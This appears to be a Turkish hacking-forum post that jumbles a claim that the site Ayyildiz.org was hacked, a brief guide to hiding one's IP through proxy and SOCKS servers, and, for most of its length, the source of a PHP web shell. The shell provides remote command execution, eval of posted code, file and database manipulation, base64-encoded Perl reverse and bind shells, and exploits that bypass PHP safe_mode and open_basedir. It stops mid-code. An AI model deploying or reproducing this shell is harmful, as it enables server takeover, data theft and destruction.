Merhaba dostlar helikopter , araba , uçak , teyyare , füze , uydu vs vs şeyler düşüren Sözde Hekır Grubu ayyildiz.org Feyklendi  

Geçmiş olsun AYT olur boyle şeyler üzmeyin kendinizi

2011 Yılında olay yaratan ve Dünya sıralamasında 5. sırada bulunan ve Dünya’nın Anonymous den sonra en iyi hacker grubu seçilenTurkguvenligi adlı hacker grubu tarafından yapıldığı görülen saldırı sonrasında Türkiye’nin önde gelen hack platformu sitesi ve Türk basında büyük yankılar uyandıran internet sitesi Ayyildiz.org hacklendi.
Dünya basınında büyük yankılar uyandıran ve 2011 yılında yapmış olduğu büyük saldırılar ile Dünya basınında büyük yankı bulan, Türk basınıda ise fazla yankı bulmayan büyük olaylara imza atan Turkguvenligi adlı hacker grubu Ayyildiz.org hackledi.

Saldırı sonrasında hacklenen intenret sitesine ise ilgin sözlerin yer aldığı index bırakıldı,

IP SPOOFING YÖNTEMLERİ:

IP Spoofing iki şekilde yapılır. Proxy/Socks sunucularını kullanarak, veya IP paketlerini editleyerek. Proxy/Socks sunucusu kullanmak basit bir yöntemdir. Daha çok web/IRC bağlantılarında IPyi gizlemek için kullanılır. IP paketlerini editleyerek yapılan IP Spoofing çok etkilidir ve genel olarak D.o.S saldırılarında veya session-hijacking yönteminde kullanılır.

PROXY/SOCKS KULLANIMI:

Internetde gezdiğiniz sitelerin sizin IP adresinizi loglarında tutmaması için, kullandığınız browserın bağlantı ayarlarına girerek bir proxy sunucusu üzerinden bağlantı yapmasını sağlayabilirsiniz. Buşekilde siz aslında proxy sunucusuna bağlanmış olurken, proxy sunucusu sizin yerinize hedefbilgisayara bağlanmış olacaktır.

Örnek:

MySystem:1059 -> MyProxy:8080

MyProxy:1039 -> MyTarget:80

Önce sistemimiz (MySystem) kullanmak istediğimiz proxy`ye (MyProxy), proxynin portundan bağlanıyor. Proxy portları 80, 3128, 8080 gibi değişik portlar olabilir. Bu bağlantı sağlanınca,sistemimiz daha üst bir protokol ile (HTTP, HTTPS), bağlanmak istediği hedef (MyTarget)bilgisayarla ilgili bilgiyi proxy`ye yolluyor. Proxy`de hedef bilgisayara bağlanıp bizim gönderdiklerimizi ona, ondan gelen bilgileri, bizim sistemimize aktarıyor. Böylece hedefbilgisayarın bağlantı loglarına bizim değil Proxy`nin IPsi geçmiş oluyor. Yalnız bazı proxy yazılımları bu konuda tam olarak IP saklama özelliğine sahip değil. Bizim isteğimizi karşı tarafa yollarken, bizim IPmizide HTTP başlığına ekleyenler var. Logların incelenmesi durumunda bağlantının gerçekten kim adına istenmiş olduğu ortaya çıkıyor. Proxy kullanımının da IP adresinizin gizlenmesiyle ilgili bir de şu tehlike var. Sizin IP adresiniz, hedef bilgisayara iletilmese de proxy loglarında tutuluyor. Bu yüzden hedef bilgisayarın admini, proxy sunucusunun loglarına başvurup sizin IPnizi bulabilir.

Eğer IP adresimizi webde surf yaparken değil de, başka bir TCP bağlantısında spoof etmek istiyorsak socks sunucusu kullanabiliriz. Socks sunucuları genelde 1080. porttan bağlantı kabul ederler ve kullanıcıya Proxy sunucusundan çok daha fazla seçenek sunar. Socks sunucusu kullanarak telnet, ftp, IRC gibi TCP bağlantısı kabul eden her sunucuya bağlanabilirsiniz. Socks sunucusu ile sistemimiz haberleşmek için TCP bağlantısını yaptıktan sonra socks protokolünü kullanır.

Örnek:

MySystem:1075 -> MySocks:1080

MySocks:1043 -> MyTarget:ftp

Proxy bağlantısında olduğu gibi yine sistemimiz önce socks sunucusuna bağlanır.

<?php
session_start();
if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
$slash="\\";
}else{
$slash="/";
}
if ($_REQUEST['address']){
if(is_readable($_REQUEST['address'])){
chdir($_REQUEST['address']);}}

$me=$_SERVER['PHP_SELF'];
$formp="<form method=post action='".$me."'>";
$formg="<form method=get action='".$me."'>";
$nowaddress='<input type=hidden name=address value="'.getcwd().'">';
if (isset($_FILES["filee"]) and ! $_FILES["filee"]["error"]) {
   move_uploaded_file($_FILES["filee"]["tmp_name"], $_FILES["filee"]["name"]);
   $ifupload="Uploaded  ";
}
if ($_REQUEST['chmode'] && $_REQUEST['chmodenum']){
chmod($_POST['chmode'],"0".$_POST['chmodenum']);
}
$head='<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Moon</title>
</head><body  topmargin="0" leftmargin="0" rightmargin="0"
bgcolor="#f2f2f2"><div align="center">
&nbsp;<table border="1" width="1000" height="14" bordercolor="#CDCDCD" style="border-collapse: collapse; border-style: solid; border-width: 1px">
<tr>
<td height="14" width="996">
<p align="center"><font face="Tahoma" style="font-size: 9pt"><span lang="en-us"><a href="?do=filemanger">File
Manger</a> -- <a href="?do=cmd">Command Execute</a> -- <a href="?do=bc">Back Connect</a> --
<a href="?do=bypasscmd">BypasS Command eXecute(SF-DF)</a> --
<a href="?do=bypassdir">BypasS Directory</a> -- <a href="?do=eval&address='.getcwd().'">
Eval</a> -- <a href="?do=db">Data Base</a> -- <a href="?do=info">
Server Information</a></span></font></td></tr></table></div>
<div align="center">
<table id="table2" style="border-collapse: collapse; border-style:
solid;" width="1000" bgcolor="#eaeaea" border="1" bordercolor="#c6c6c6"
cellpadding="0"><tbody><tr><td><div align="center"><table id="table3" style="border-style:dashed; border-width:1px; margin-top: 20px; margin-bottom: 20px;
border-collapse: collapse" width="950" border="1" bordercolor="#cdcdcd"
 height="620" bordercolorlight="#CDCDCD" bordercolordark="#CDCDCD"><tbody><tr>
<td style="border: 1px solid rgb(198, 198, 198);"
width="950" bgcolor="#e7e3de" height="590" valign="top">';
$end='<p align="center">&nbsp;</td></tr></tbody></table></div></td></tr><tr><td bgcolor="#c6c6c6"><p style="margin-top: 0pt; margin-bottom: 0pt" align="center"><span lang="en-us"><font face="Tahoma" style="font-size: 9pt">Coded by Amin Shokohi (Pejvak)<br><a href="http://www.itsecteam.com" target="_blank><font size=1>iTSecTeam.com</a></font></span></td></tr></tbody></table></div></body></html>';
$deny=$head."<p align='center'> <b>Oh My God!<br> Permission Denied".$end;
if ($_GET['do']=="edit" && $_GET['filename']!="dir"){
if(is_readable($_GET['address'].$_GET['filename'])){
$opedit=fopen($_GET['address'].$_GET['filename'],"r");
while(!feof($opedit))
$data.=fread($opedit,9999);
fclose($opedit);
echo $head.$formp.$nowaddress.'<p align="center">File Name : '.$_GET['address'].$_GET['filename'].'<br><textarea rows="19" name="fedit" cols="87">'.htmlspecialchars("$data", ENT_QUOTES).'</textarea><br><input value="'.$_GET['filename'].'" name=namefe><br><input type=submit value="  Save  "></form></p>'.$end;exit;
}else{echo $deny;exit;}}
function sizee($size)
{
 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
 else {$size = $size . " B";}
 return $size;
}
function deleteDirectory($dir) {
if (!file_exists($dir)) return true;
if (!is_dir($dir) || is_link($dir)) return unlink($dir);
foreach (scandir($dir) as $item) {
if ($item == '.' || $item == '..') continue;
if (!deleteDirectory($dir . "/" . $item)) {
chmod($dir . "/" . $item, 0777);
if (!deleteDirectory($dir . "/" . $item)) return false;
};}return rmdir($dir);}
if($_GET['do']=="rename"){
echo $head.$formp.$nowaddress.'<p align="center"><input value='.$_GET['filename'].'><input type=hidden name=addressren value='.$_GET['address'].$_GET['filename'].'> To <input name=nameren><br><input type=submit value="  Save  "></form></p>'.$end;exit;
}
if ($_REQUEST['cdirname']){
if(is_writable($_REQUEST['address'])){
mkdir($_REQUEST['address'].$slash.$_REQUEST['cdirname'],"0777");}else{echo $deny;exit;}}
function bcn($ipbc,$pbc){
$bcperl="IyEvdXNyL2Jpbi9wZXJsCiMgQ29ubmVjdEJhY2tTaGVsbCBpbiBQZXJsLiBTaGFkb3cxMjAgLSB3
NGNrMW5nLmNvbQoKdXNlIFNvY2tldDsKCiRob3N0ID0gJEFSR1ZbMF07CiRwb3J0ID0gJEFSR1Zb
MV07CgogICAgaWYgKCEkQVJHVlswXSkgewogIHByaW50ZiAiWyFdIFVzYWdlOiBwZXJsIHNjcmlw
dC5wbCA8SG9zdD4gPFBvcnQ+XG4iOwogIGV4aXQoMSk7Cn0KcHJpbnQgIlsrXSBDb25uZWN0aW5n
IHRvICRob3N0XG4iOwokcHJvdCA9IGdldHByb3RvYnluYW1lKCd0Y3AnKTsgIyBZb3UgY2FuIGNo
YW5nZSB0aGlzIGlmIG5lZWRzIGJlCnNvY2tldChTRVJWRVIsIFBGX0lORVQsIFNPQ0tfU1RSRUFN
LCAkcHJvdCkgfHwgZGllICgiWy1dIFVuYWJsZSB0byBDb25uZWN0ICEiKTsKaWYgKCFjb25uZWN0
KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsIGluZXRfYXRvbigkaG9zdCkpKSB7ZGll
KCJbLV0gVW5hYmxlIHRvIENvbm5lY3QgISIpO30KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOwog
IG9wZW4oU1RET1VULCI+JlNFUlZFUiIpOwogIG9wZW4oU1RERVJSLCI+JlNFUlZFUiIpOwogIGV4
ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow==";
$opbc=fopen("bcc.pl","w");
fwrite($opbc,base64_decode($bcperl));
fclose($opbc);
system("perl bcc.pl $ipbc $pbc") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
}
function wbp($wb){
$wbp="dXNlIFNvY2tldDsKJHBvcnQJPSAkQVJHVlswXTsKJHByb3RvCT0gZ2V0cHJvdG9ieW5hbWUoJ3Rj
cCcpOwpzb2NrZXQoU0VSVkVSLCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKTsKc2V0c29j
a29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JFVVNFQUREUiwgcGFjaygibCIsIDEpKTsKYmlu
ZChTRVJWRVIsIHNvY2thZGRyX2luKCRwb3J0LCBJTkFERFJfQU5ZKSk7Cmxpc3RlbihTRVJWRVIs
IFNPTUFYQ09OTik7CmZvcig7ICRwYWRkciA9IGFjY2VwdChDTElFTlQsIFNFUlZFUik7IGNsb3Nl
IENMSUVOVCkKewpvcGVuKFNURElOLCAiPiZDTElFTlQiKTsKb3BlbihTVERPVVQsICI+JkNMSUVO
VCIpOwpvcGVuKFNUREVSUiwgIj4mQ0xJRU5UIik7CnN5c3RlbSgnY21kLmV4ZScpOwpjbG9zZShT
VERJTik7CmNsb3NlKFNURE9VVCk7CmNsb3NlKFNUREVSUik7Cn0g";
$opwb=fopen("wbp.pl","w");
fwrite($opwb,base64_decode($wbp));
fclose($opwb);
echo getcwd();
system("perl wbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
}
function lbp($wb){
$lbp="IyEvdXNyL2Jpbi9wZXJsCnVzZSBTb2NrZXQ7JHBvcnQ9JEFSR1ZbMF07JHByb3RvPWdldHByb3Rv
YnluYW1lKCd0Y3AnKTskY21kPSJscGQiOyQwPSRjbWQ7c29ja2V0KFNFUlZFUiwgUEZfSU5FVCwg
U09DS19TVFJFQU0sICRwcm90byk7c2V0c29ja29wdChTRVJWRVIsIFNPTF9TT0NLRVQsIFNPX1JF
VVNFQUREUiwgcGFjaygibCIsIDEpKTtiaW5kKFNFUlZFUiwgc29ja2FkZHJfaW4oJHBvcnQsIElO
QUREUl9BTlkpKTtsaXN0ZW4oU0VSVkVSLCBTT01BWENPTk4pO2Zvcig7ICRwYWRkciA9IGFjY2Vw
dChDTElFTlQsIFNFUlZFUik7IGNsb3NlIENMSUVOVCl7b3BlbihTVERJTiwgIj4mQ0xJRU5UIik7
b3BlbihTVERPVVQsICI+JkNMSUVOVCIpO29wZW4oU1RERVJSLCAiPiZDTElFTlQiKTtzeXN0ZW0o
Jy9iaW4vc2gnKTtjbG9zZShTVERJTik7Y2xvc2UoU1RET1VUKTtjbG9zZShTVERFUlIpO30g";
$oplb=fopen("lbp.pl","w");
fwrite($oplb,base64_decode($lbp));
fclose($oplb);
system("perl lbp.pl $wb") or die("I Can Not Execute Command For Back Connect Disable_functions Or Safe Mode");
}

if($_REQUEST['portbw']){
wbp($_REQUEST['portbw']);

}if($_REQUEST['portbl']){
lbp($_REQUEST['portbl']);
}
if($_REQUEST['ipcb'] && $_REQUEST['portbc']){
bcn($_REQUEST['ipcb'],$_REQUEST['portbc']);

}

if($_REQUEST['do']=="bc"){
echo $head.$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Back Connect >>>>>><br>Ip Address : <input name=ipcb value=".$_SERVER['REMOTE_ADDR'] ."> Port : <input name=portbc value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Windows Bind Port >>>>>><br>Port : <input name=portbw value=5555><br><input type=submit value=Connect></form>".$formp."<p align='center'>Usage : Run Netcat In Your Machin And Execute This Command( Disable Firewall !!! )<br><hr><p align='center'><<<<<< Linux Bind Port >>>>>><br>Port : <input name=portbl value=5555><br><input type=submit value=Connect></form>".$end;exit;

}

if ($_REQUEST['copyname'] && $_REQUEST['cpyto']){
if(is_writable($_REQUEST['cpyto'])){

copy($_REQUEST['address'].$slash.$_REQUEST['copyname'],$_REQUEST['cpyto']);
}else{echo $deny;exit;}}
if($_REQUEST['cfilename']){

echo $head.$formp.$nowaddress.'<p align="center"><b>Create File</b><br><textarea rows="19" name="nf4cs" cols="87"></textarea><br><input value="'.$_REQUEST['cfilename'].'" name=nf4c><br><input type=submit value="  Create  "></form>'.$end;exit;
}

if($_REQUEST['nf4c'] && $_REQUEST['nf4cs']){
if(is_writable($_REQUEST['address'])){

$ofile4c=fopen($_REQUEST['address'].$slash.$_REQUEST['nf4c'],"w");
fwrite($ofile4c,$_REQUEST['nf4cs']);
fclose($ofile4c);
}else{echo $deny;exit;}}

function sqlclienT(){
global $t,$errorbox,$et,$hcwd;
if(!empty($_REQUEST['serveR']) && !empty($_REQUEST['useR']) && isset($_REQUEST['pasS']) && !empty($_REQUEST['querY'])){
$server=$_REQUEST['serveR'];$type=$_REQUEST['typE'];$pass=$_REQUEST['pasS'];$user=$_REQUEST['useR'];$query=$_REQUEST['querY'];
$db=(empty($_REQUEST['dB']))?'':$_REQUEST['dB'];
$_SESSION[server]=$_REQUEST['serveR'];$_SESSION[type]=$_REQUEST['typE'];$_SESSION[pass]=$_REQUEST['pasS'];$_SESSION[user]=$_REQUEST['useR'];

}

if (isset ($_GET[select_db])){
	$getdb=$_GET[select_db];
	$_SESSION[db]=$getdb;
	$query="SHOW TABLES";
	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
}
elseif (isset ($_GET[select_tbl])){
	$tbl=$_GET[select_tbl];
	$_SESSION[tbl]=$tbl;
	$query="SELECT * FROM `$tbl`";
	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
}
elseif (isset ($_GET[drop_db])){
	$getdb=$_GET[drop_db];
	$_SESSION[db]=$getdb;
	$query="DROP DATABASE `$getdb`";
	querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'',$query);
	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],'','SHOW DATABASES');
}
elseif (isset ($_GET[drop_tbl])){
	$getbl=$_GET[drop_tbl];
	$query="DROP TABLE `$getbl`";
	querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],'SHOW TABLES');
}
elseif (isset ($_GET[drop_row])){
	$getrow=$_GET[drop_row];
	$getclm=$_GET[clm];
	$query="DELETE FROM `$_SESSION[tbl]` WHERE $getclm='$getrow'";
	$tbl=$_SESSION[tbl];
	querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],$query);
	$res=querY($_SESSION[type],$_SESSION[server],$_SESSION[user],$_SESSION[pass],$_SESSION[db],"SELECT * FROM `$tbl`");
}
else
	$res=querY($type,$server,$user,$pass,$db,$query);

if($res){
$res=htmlspecialchars($res);
$row=array ();
$title=explode('[+][+][+]',$res);
$trow=explode('[-][-][-]',$title[1]);
$row=explode('|+|+|+|+|+|',$title[0]);
$data=array();
$field=$trow[count($trow)-2];
if (strstr($trow[0],'Database')!='')
	$obj='db';
elseif (substr($trow[0],0,6)=='Tables')
	$obj='tbl';
else
	$obj='row';
$i=0;
foreach ($row as $a){
if($a!='')
$data[$i++]=explode('|-|-|-|-|-|',$a);
}

echo "<table border=1 bordercolor='#C6C6C6' cellpadding='2' bgcolor='EAEAEA' width='100%' style='border-collapse: collapse'><tr>";
foreach ($trow as $ti)
echo "<td bgcolor='F2F2F2'>$ti</td>";
echo "</tr>";
$j=0;
while ($data[$j]){
	echo "<tr>";
	foreach ($data[$j++] as $dr){
		echo "<td>";
		if($obj!='row') echo "<a href='$_SERVER[PHP_SELF]?do=db&select_$obj=$dr'>";
		echo $dr;
		if($obj!='row') echo "</a>";
		echo "</td>";
	}
	echo "<td><a href='$_SERVER[PHP_SELF]?do=db&drop_$obj=$dr";
	if($obj=='row')
		echo "&clm=$field";
	echo "'>Drop</a></td></tr>";
}
echo "</table><br>";

}

if(empty($_REQUEST['typE']))$_REQUEST['typE']='';
echo "<center><form name=client method='POST' action='$_SERVER[PHP_SELF]?do=db'><table border='1' width='400' style='border-collapse: collapse' id='table1' bordercolor='#C6C6C6' cellpadding='2'><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Connect to Database</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Type:</font></td><td width='250' bgcolor='#EAEAEA'><select name=typE><option valut=MySQL  onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='MySQL')echo 'selected';
echo ">MySQL</option><option valut=MSSQL onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='MSSQL')echo 'selected';
echo ">MSSQL</option><option valut=Oracle onClick='document.client.serveR.disabled = true;' ";
if ($_REQUEST['typE']=='Oracle')echo 'selected';
echo ">Oracle</option><option valut=PostgreSQL onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='PostgreSQL')echo 'selected';
echo ">PostgreSQL</option><option valut=DB2 onClick='document.client.serveR.disabled = false;' ";
if ($_REQUEST['typE']=='DB2')echo 'selected';
echo ">IBM DB2</option></select></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Server Address:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
if (!empty($_REQUEST['serveR'])) echo htmlspecialchars($_REQUEST['serveR']);else echo 'localhost';
echo "' name=serveR size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Username:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text name=useR value='";
if (!empty($_REQUEST['useR'])) echo htmlspecialchars($_REQUEST['useR']);else echo 'root';
echo "' size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Password:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
if (isset($_REQUEST['pasS'])) echo htmlspecialchars($_REQUEST['pasS']);else echo '123';
echo "' name=pasS size=35></td></tr><tr><td width='400' colspan='2' bgcolor='#F2F2F2'><p align='center'><b><font face='Arial' size='2' color='#433934'>Submit a Query</font></b></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>DB Name:</font></td><td width='250' bgcolor='#EAEAEA'><input type=text value='";
if (!empty($_REQUEST['dB'])) echo htmlspecialchars($_REQUEST['dB']);
echo "' name=dB size=35></td></tr><tr><td width='150' bgcolor='#EAEAEA'><font face='Arial' size='2'>Query:</font></td><td width='250' bgcolor='#EAEAEA'><textarea name=querY rows=5 cols=27>";
if (!empty($_REQUEST['querY'])) echo htmlspecialchars(($_REQUEST['querY']));else echo 'SHOW DATABASES';
echo "</textarea></td></tr><tr><td width='400' colspan='2' bgcolor='#EAEAEA'>$hcwd<input type=submit value='Submit' style='float: right'></td></tr></table></form>$et</center>";
}

function querY($type,$host,$user,$pass,$db='',$query){
$res='';
switch($type){
case 'MySQL':
if(!function_exists('mysql_connect'))return 0;
$link=mysql_connect($host,$user,$pass);
if($link){
if(!empty($db))mysql_select_db($db,$link);
$result=mysql_query($query,$link);
if ($result!=1){
while($data=mysql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<mysql_num_fields($result);$i++)
$res.=mysql_field_name($result,$i).'[-][-][-]';
}
mysql_close($link);
return $res;
}
break;
case 'MSSQL':
if(!function_exists('mssql_connect'))return 0;
$link=mssql_connect($host,$user,$pass);
if($link){
if(!empty($db))mssql_select_db($db,$link);
$result=mssql_query($query,$link);
while($data=mssql_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<mssql_num_fields($result);$i++)
$res.=mssql_field_name($result,$i).'[-][-][-]';
mssql_close($link);
return $res;
}
break;
case 'Oracle':
if(!function_exists('ocilogon'))return 0;
$link=ocilogon($user,$pass,$db);
if($link){
$stm=ociparse($link,$query);
ociexecute($stm,OCI_DEFAULT);
while($data=ocifetchinto($stm,$data,OCI_ASSOC+OCI_RETURN_NULLS))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<oci_num_fields($stm);$i++)
$res.=oci_field_name($stm,$i).'[-][-][-]';
return $res;
}
break;
case 'PostgreSQL':
if(!function_exists('pg_connect'))return 0;
$link=pg_connect("host=$host dbname=$db user=$user password=$pass");
if($link){
$result=pg_query($link,$query);
while($data=pg_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<pg_num_fields($result);$i++)
$res.=pg_field_name($result,$i).'[-][-][-]';
pg_close($link);
return $res;
}
break;
case 'DB2':
if(!function_exists('db2_connect'))return 0;
$link=db2_connect($db,$user,$pass);
if($link){
$result=db2_exec($link,$query);
while($data=db2_fetch_row($result))$res.=implode('|-|-|-|-|-|',$data).'|+|+|+|+|+|';
$res.='[+][+][+]';
for($i=0;$i<db2_num_fields($result);$i++)
$res.=db2_field_name($result,$i).'[-][-][-]';
db2_close($link);
return $res;
}
break;
}
return 0;
}
function bywsym($file){
if(!function_exists('symlink')){echo "Function Symlink Not Exist";}

if(!is_writable("."))
	die("not writable directory");
$level=0;
for($as=0;$as<$fakedep;$as++){
	if(!file_exists($fakedir))
		mkdir($fakedir);
	chdir($fakedir);
}
while(1<$as--) chdir("..");
$hardstyle = explode("/", $file);
for($a=0;$a<count($hardstyle);$a++){
	if(!empty($hardstyle[$a])){
		if(!file_exists($hardstyle[$a]))
			mkdir($hardstyle[$a]);
		chdir($hardstyle[$a]);
		$as++;
}}
$as++;
while($as--)
	chdir("..");
@rmdir("fakesymlink");
@unlink("fakesymlink");
@symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
while(1)
	if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break;
	else $num++;
@unlink("fakesymlink");
mkdir("fakesymlink");
}
function bypcu($file){
$level=0;

if(!file_exists("file:"))
	mkdir("file:");
chdir("file:");
$level++;

$hardstyle = explode("/", $file);

for($a=0;$a<count($hardstyle);$a++){
	if(!empty($hardstyle[$a])){
		if(!file_exists($hardstyle[$a]))
			mkdir($hardstyle[$a]);
		chdir($hardstyle[$a]);
		$level++;
	}
}

while($level--) chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);

echo '<FONT COLOR="RED"> <textarea rows="40" cols="120">';

if(FALSE==curl_exec($ch))
	die('>Sorry... File '.htmlspecialchars($file).' doesnt exists or you dont have permissions.');

echo ' </textarea> </FONT>';

curl_close($ch);
}
if ($_REQUEST['bypcu']){
bypcu($_REQUEST['bypcu']);
}
if($_REQUEST['do']=="bypasscmd"){
if($_POST['bycw']){
echo $_POST['bycw'];
$wsh = new COM('W'.'Scr'.'ip'.'t.she'.'ll');
            $exec = $wsh->exec ("cm"."d.e"."xe /c ".$_POST['bycw']."");
            $stdout = $exec->StdOut();
            $stcom = $stdout->ReadAll();}

echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);} echo $stcom.'</textarea><hr><center>Bypass Safe_Mode And Disable_Functions In Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'<input type=hidden value="bypasscmd" name=do>Command </font></td><td width="750"><input name=bycw size=50><input type=submit value ="eXecute"></form></td></tr></table>Bypass Safe_Mode Windows Server<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Command </font></td><td width="750"><input name=byws size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypasscmd"></form></td></tr></table>'.$end;exit;;
}
if($_REQUEST['do']=="bypassdir"){
if($_POST['byoc']){
if(copy("compress.zlib://".$_POST['byoc'], getcwd()."/"."peji.txt")){
$bopens="Bypass Succesfull Plz Read File Peji.txt In This Folder";
}else{$bopens="Can Not Bypass This";}
}
if($_POST['byfc']){
curl_init("file:///".$_POST['byfc']."\x00/../../../../../../../../../../../../".__FILE__);
$debfc=curl_exec($ch);
}
if($_POST['byetc']){
for($bye=0;$bye<40000;$bye++){   //cat /etc/passwd
$sbep =$sbep. posix_getpwuid($bye);
}}
if($_POST['byfc9']){
echo "not sucsfull";
}
if($_REQUEST['bysyml']){
$file=$_REQUEST['bysyml'];
bywsym($file);
}
echo $head.'<p align="center"><textarea rows="13" name="showbsd" cols="77">';if($_POST['byws']){passthru("\\".$_POST['byws']);}if(isset($sbep)){for($fbe=0;$fbe<count($sbep);$fbe++){echo $sbep[$fbe];}} if(isset($debfc)){var_dump($debfc);} echo $bopens.'</textarea><hr><center>Bypass Safe_Mode And Open_basedir With Bug Copy(Zlib) Worked In 4.4.2 .. 5.1.2<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right">'.$formp.'<input type=hidden value="bypassdir" name=do><font face="Tahoma" style="font-size: 10pt; font-weight:700">Address File </font></td><td width="750"><input name=byoc size=50 ><input type=submit value ="read"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.4.2 and 5.1.4<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass Open_basedir And Read File With Bug Curl Worked In PHP 4.X ... 5.2.9<br><table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'Address File </font></td><td width="750"><input name=byfc9 size=50><input type=submit value ="eXecute"><input type=hidden name=do value="bypassdir"></form></td></tr></table><hr>Bypass /Etc/Passwd<br>'.$formp.'<input type=submit value ="Read Passwd"><input type=hidden name=byetc value="lol"><input type=hidden name=do value="bypassdir"></form><hr>Bypass With ini_restore'.$formp.'<input type=submit value ="Read File"><input name=rfili value="Pejijon" type=hidden><input type=hidden name=do value="bypassdir"></form><hr>Bypass With Symlink Worked In 5.x.x 5.2.11 With Bug Symlink<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bysyml size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"><input name=rfili value="Pejijon" type=hidden></form></td></tr></table><hr>'.$formp.'Bypass Safe And Open_basedir With Bug Curl Worked In 4.x.x ... 5.2.9<table border="0" width="950" style="border-collapse: collapse" id="table4" cellpadding="5"><tr><td width="200" align="right" valign="top"><font face="Tahoma" style="font-size: 10pt; font-weight:700">'.$formp.'</font></td><td width="750"><input name=bypcu size=50><input type=submit value ="Read File"><input type=hidden name=do value="bypassdir"></form></td></tr></table>'.$end;exit;;

}
if($_POST['nameren'] && $_POST['addressren']){
if(is_writable($_REQUEST['addressren'])){

rename($_POST['addressren'],$_POST['nameren']);}else{echo $deny;exit;}
}
if($_GET['do']=="delete"){

if ($_GET['type']=="dir"){
if(is_writable($_REQUEST['address'])){
$dir=$_GET['address'].$_GET['filename'];
deleteDirectory($dir);
}elseif($_GET['type']=="file"){
if(is_writable($_GET['address'].$_GET['filename'])){

unlink($_GET['address'].$_GET['filename']);}else{echo $deny;exit;}
}
}}
if($_POST['fedit'] && $_POST['namefe']){
if(is_writable($_REQUEST['address'])){

$opensave=fopen($_POST['address'].$slash.$_POST['namefe'],"w");
echo bazam;
fwrite($opensave,$_POST['fedit']);
fclose($opensave);}else{echo $deny;exit;}
}
if ($_POST['evalsource']){

eval($_POST['evalsource']);
}
if($_GET['do']=="eval"){
